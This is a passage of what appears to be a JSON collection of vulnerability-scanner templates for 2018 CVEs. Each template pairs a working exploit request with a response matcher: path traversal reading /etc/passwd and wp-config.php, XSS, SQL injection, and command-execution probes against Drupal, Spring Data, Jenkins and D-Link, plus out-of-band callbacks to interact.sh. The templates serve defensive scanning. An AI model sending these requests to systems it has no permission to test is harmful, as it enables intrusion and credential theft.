Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6184","info":{"name":"Zeit Next.js <4.2.3 -  Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-13980","info":{"name":"Zeta Producer Desktop CMS <14.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16299","info":{"name":"WordPress Localize My Post 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17153","info":{"name":"Western Digital MyCloud NAS - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /web/google_analytics.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: isAdmin=1; username=admin;\n\ncmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23\n"],"matchers":[{"type":"dsl","dsl":["regex(\"uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)\", body)","contains(body, \"ganalytics\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2018-2791","info":{"name":"Oracle Fusion Middleware WebCenter Sites - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{BaseURL}}\n","GET /cs/Satellite?destpage=\"<h1xxx\"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1\nHost: {{BaseURL}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif"]},{"type":"word","part":"body","words":["<script>alert(24)</script>","Missing translation key"],"condition":"and"}]}]},{"id":"CVE-2018-14574","info":{"name":"Django - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//www.interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://www.interact.sh","Location: http://www.interact.sh"]},{"type":"status","status":[301]}]}]},{"id":"CVE-2018-18069","info":{"name":"WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin.php"],"body":"icl_post_action=save_theme_localization&locale_file_name_en=EN\"><script>alert(0);</script>\n","host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(tolower(header), \"text/html\")","contains(set_cookie, \"_icl_current_admin_language\")","contains(body, \"\\\"><script>alert(0);</script>\")"],"condition":"and"}]}]},{"id":"CVE-2018-5233","info":{"name":"Grav CMS <1.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["/themes/grav","Grav Admin Login","data-grav-"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16670","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/user/values.xml?var=STATUS"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["<values><variable><id>","Reader.STATUS"],"condition":"and"}]}]},{"id":"CVE-2018-14474","info":{"name":"Orange Forum 1.4.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?next=http://interact.sh/?app.scan/","{{BaseURL}}/signup?next=http://interact.sh/?app.scan/"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-19365","info":{"name":"Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000600","info":{"name":"Jenkins GitHub Plugin <=1.29.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-14013","info":{"name":"Synacor Zimbra Collaboration Suite Collaboration <8.8.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10735","info":{"name":"NagiosXI <= 5.4.12 `commandline.php` SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5({{num}}))%23"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-11231","info":{"name":"Opencart Divido - Sql Injection","severity":"high"},"requests":[{"raw":["POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1\nHost: {{Hostname}}\n\n{\"metadata\":{\"order_id\":\"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)\"},\"status\":2}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11473","info":{"name":"Monstra CMS 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /users/registration HTTP/1.1\nHost: {{Hostname}}\n","POST /users/registration HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test&register=Register\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","Monstra"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["id=\"csrf\" name=\"csrf\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-7422","info":{"name":"WordPress Site Editor <=1.1.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php","{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"],"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-14912","info":{"name":"cgit < 1.2.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7600","info":{"name":"Drupal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\nHost:  {{Hostname}}\nAccept: application/json\nReferer:  {{Hostname}}/user/register\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663\n\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#post_render][]\"\n\npassthru\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#type]\"\n\nmarkup\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#markup]\"\n\ncat /etc/passwd\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"form_id\"\n\nuser_register_form\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"_drupal_ajax\"\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18925","info":{"name":"Gogs (Go Git Service) 0.11.66 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=en-US; i_like_gogits=../../../../etc/passwd;\n","GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=en-US; i_like_gogits=../../../../etc/dummy;\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 500 && status_code_2 == 200 && contains(body_2, \"<meta name=\\\"author\\\" content=\\\"Gogs\\\" />\")"]}]}]},{"id":"CVE-2018-17246","info":{"name":"Kibana - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"message\":\"An internal server error occurred\""]},{"type":"word","part":"header","words":["kbn-name","kibana"],"case-insensitive":true,"condition":"or"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2018-16139","info":{"name":"BIBLIOsoft BIBLIOpac 2008 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=\"><script>prompt(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>prompt(document.domain)</script>.xrf"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15138","info":{"name":"LG-Ericsson iPECS NMS 30M - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data","{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16341","info":{"name":"Nuxeo <10.3 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml"],"matchers":[{"type":"word","part":"body","words":["31333333337"]}]}]},{"id":"CVE-2018-12613","info":{"name":"PhpMyAdmin <4.8.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8727","info":{"name":"Mirasys DVMS Workstation <=5.12.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-1000856","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /segments/add.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test\n","GET /segments/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20985","info":{"name":"WordPress Payeezy Pay <=2.97 - Local File Inclusion","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"],"body":"x_login=../../../wp-config","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The base configuration for WordPress","define( 'DB_NAME',","define( 'DB_PASSWORD',"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9118","info":{"name":"WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_HOST","The base configurations of the WordPress"],"condition":"and"}]}]},{"id":"CVE-2018-7282","info":{"name":"TITool PrintMonitor - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}')+OR+4191=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(50000000/2))))--+vDwl&password={{password}}&language=en\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"PrintMonitor\") && contains(header, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2018-18608","info":{"name":"DedeCMS 5.7 SP2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/feedback.php/rp4hu%27><script>alert%28document.domain%29<%2fscript>?aid=3"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>","DedeCMS Error Warning!"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19892","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /admin/dw/add-server.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes=\n","GET /admin/dw/servers.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16133","info":{"name":"Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET \\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-19915","info":{"name":"DomainMOD <=4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/host.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_host=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=test\n","GET /assets/hosting.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-8719","info":{"name":"WordPress WP Security Audit Log 3.1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/wp-security-audit-log/failed-logins/"],"matchers-condition":"and","matchers":[{"type":"word","words":["[TXT]",".log","Index of"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11759","info":{"name":"Apache Tomcat JK Connect <=1.2.44 - Manager Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jkstatus","{{BaseURL}}/jkstatus;"],"matchers-condition":"and","matchers":[{"type":"word","words":["JK Status Manager"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12296","info":{"name":"Seagate NAS OS 4.3.15.1 - Server Information Disclosure","severity":"high"},"requests":[{"raw":["POST /api/external/7.0/system.System.get_infos HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"body","words":["\"version\":","\"serial_number\":"],"condition":"and"}],"extractors":[{"type":"regex","group":1,"regex":["\"version\": \"([0-9.]+)\""],"part":"body"}]}]},{"id":"CVE-2018-14916","info":{"name":"Loytec LGATE-902 <6.4.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1273","info":{"name":"Spring Data Commons - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /account HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nContent-Type: application/x-www-form-urlencoded\n\nname[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode(command)}}')]={{to_lower(rand_text_alpha(5))}}\n"],"payloads":{"command":["cat /etc/passwd","type C:\\/Windows\\/win.ini"]},"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"}]}]},{"id":"CVE-2018-10141","info":{"name":"Palo Alto Networks PAN-OS GlobalProtect <8.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var valueUser = \"j\";-alert(1)-\"x\";"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20010","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/ssl-provider-account.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes=\n","GET /assets/ssl-accounts.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-10823","info":{"name":"D-Link Routers - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9161","info":{"name":"PrismaWEB - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/user/scripts/login_par.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["txtChkUser","txtChkPassword"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15517","info":{"name":"D-Link Central WifiManager - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-20463","info":{"name":"WordPress JSmol2WP <=1.07 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'DB_USER',","'DB_PASSWORD'"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5715","info":{"name":"SugarCRM 3.5.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["&\"/><script>alert(1)</script>=&\"><< Back</a><br><br>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16671","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/device-id"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["circontrol"]},{"type":"regex","part":"body","regex":["(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])"]}]}]},{"id":"CVE-2018-7196","info":{"name":"osTicket < 1.10.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /scp/login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"osticket\")"],"internal":true}],"extractors":[{"type":"regex","name":"csrftoken","part":"body","group":1,"regex":["__CSRFToken__\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1\n","GET /scp/index.php?sort=\"><script>alert(document.domain);</script>&dir=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"\\\"><script>alert(document.domain);</script>\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2018-10201","info":{"name":"Ncomputing vSPace Pro 10 and 11 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini","{{BaseURL}}/...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini","{{BaseURL}}/..../..../..../..../..../..../..../..../..../windows/win.ini","{{BaseURL}}/....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-19877","info":{"name":"Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>confirm(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18778","info":{"name":"ACME mini_httpd <1.30 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","part":"header","words":["Server: mini_httpd"],"internal":true}]},{"raw":["GET /etc/passwd HTTP/1.1\nHost:\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19287","info":{"name":"WordPress Ninja Forms <3.3.18 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date=\"><img+src%3Dx+onerror%3Dalert%28document.domain%29%3B%2F%2F&end_date&filter_action=Filter&paged=1&action2=-1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Begin Date\" value=\"\\\"><img src=x onerror=alert(document.domain);//\">"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000861","info":{"name":"Jenkins - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["package#vulntest"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10956","info":{"name":"IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11409","info":{"name":"Splunk <=7.0.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json","{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json"],"matchers-condition":"and","matchers":[{"type":"word","words":["licenseKeys"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20608","info":{"name":"Imcat 4.4 - Phpinfo Configuration","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/imcat/root/tools/adbug/binfo.php?phpinfo1"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2018-20526","info":{"name":"Roxy Fileman 1.4.5 - Unrestricted File Upload","severity":"critical"},"requests":[{"raw":["POST /php/upload.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary20kgW2hEKYaeF5iP\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"action\"\n\nupload\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"method\"\n\najax\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"d\"\n\n/Uploads\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"files[]\"; filename=\"{{randstr}}.php7\"\nContent-Type: 